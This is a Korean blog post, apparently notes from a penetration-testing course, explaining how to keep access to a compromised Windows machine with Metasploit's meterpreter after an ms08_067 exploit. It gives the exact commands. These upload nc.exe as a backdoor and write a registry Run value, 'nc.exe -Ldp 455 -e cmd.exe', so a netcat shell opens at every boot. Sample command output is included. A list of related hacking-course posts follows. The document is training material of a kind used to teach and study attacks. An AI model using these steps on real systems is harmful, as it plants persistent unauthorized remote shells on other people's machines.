우선 기존의 exploit 을 통해 meterpreter 쉘로 진입한다.
(일단 예시를 위해 ms08_067 로 익스플로잇)
그 후, upload 명령어를 이용해 nc.exe 를 업로드 시킨다. (백도어)
업로드 명령어
upload [Upload_File_Path] [To_upload_File_path]
백도어를 설치하는 이유는 장악 유지를 하기 위해, 언제든지 내가 침입하기 위해 설치하는 것
백도어를 설치할 때는, 우선 항상 실행되게 하기 위해 레지스트리에 등록을 해놓고, 시작프로그램으로 실행되게 한다.
meterpreter> reg
// 레지스트리 명령어
시작 프로그램 등록을 위해 우리가 변경해야 할 레지스트리의 키 경로는,
HKEY_LOCAL_MACHINE - SOFTWARE - Microsoft - Windows - CurrentVersion - Run
이다.
여기에 nc 를 등록시키면 부팅시 자동으로 실행시킨다.
우선 값을 확인하면
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Keys (1):
OptionalComponents
Values (4):
VMware Tools
VMware User Process
Adobe Reader Speed Launcher
Adobe ARM
이렇게 나온다.
그 후, 이 레지스터에 값을 쓰기 위해
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\nc.exe -Ldp 455 -e cmd.exe'
Successful set nc.
하고, 윈도우에서 regedit 으로 확인해 보면
이렇게 nc 가 추가된 것이 보인다.
그 후, nc 로 접속해 보면
접속된 것을 확인 할 수 있다.
'외부 교육 정리 > 서울여대 정보보호 영재교육원' 카테고리의 다른 글
[모의해킹] 리눅스 웹서버 취약점 탐색 - nikto (0) | 2015.01.16 |
---|---|
[모의해킹] 자동 백도어 설치 (0) | 2015.01.16 |
모의해킹 - Heap Overflow 를 이용한 Exploit (0) | 2015.01.15 |
메타스플로잇- API를 이용하기 (0) | 2015.01.15 |
모의해킹용 툴 메타스플로잇 (0) | 2015.01.14 |